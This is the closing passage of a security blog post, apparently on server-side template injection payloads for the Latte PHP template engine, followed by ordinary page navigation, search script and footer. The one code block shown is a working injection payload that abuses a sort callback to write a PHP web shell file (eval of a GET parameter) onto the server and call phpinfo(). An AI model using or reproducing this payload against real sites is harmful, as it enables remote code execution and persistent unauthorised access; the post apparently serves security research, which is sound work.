<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">   &lt;li&gt;&#123;=[<span class="string">&quot;this&quot;</span>,<span class="string">&quot;siebene&quot;</span>]|sort: <span class="function"><span class="keyword">function</span> (<span class="params"><span class="variable">$a</span>,<span class="variable">$b</span></span>)  </span>&#123;  		</span><br><span class="line">	<span class="string">&quot;$&#123;is_string($<span class="subst">&#123;$a&#125;</span>-&gt;call(function ()&#123; file_put_contents(&#x27;sie.php&#x27;,&#x27;&lt;?php eval(<span class="subst">$_GET</span>[s]);&#x27;);phpinfo(); &#125;)())&#125;&quot;</span>;</span><br><span class="line">&#125;&#125;&lt;/li&gt;</span><br></pre></td></tr></table></figure>


      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2021/10/16/Cache-Probing-Note/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2021-11-22 14:33:37
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/WEB/" title="WEB">
                        #WEB
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/01/24/RWCTF2022-WriteUps/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#TL-DR"><span class="toc-text">TL;DR</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E2%80%9D-%E2%80%9C-Bypass"><span class="toc-text">”${}“ Bypass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-to-get-this"><span class="toc-text">How to get $this</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Another-RCE-Payloads"><span class="toc-text">Another RCE Payloads</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Siebene">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Siebene">Copyright © 2023 Siebene@</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Siebene">Theme by Oranges</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Latte-SSTI-Payloads + '&url=' + https%3A%2F%2Fsiebene.github.io%2F2021%2F11%2F22%2FLatte-SSTI-Payloads%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://siebene.github.io/2021/11/22/Latte-SSTI-Payloads/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
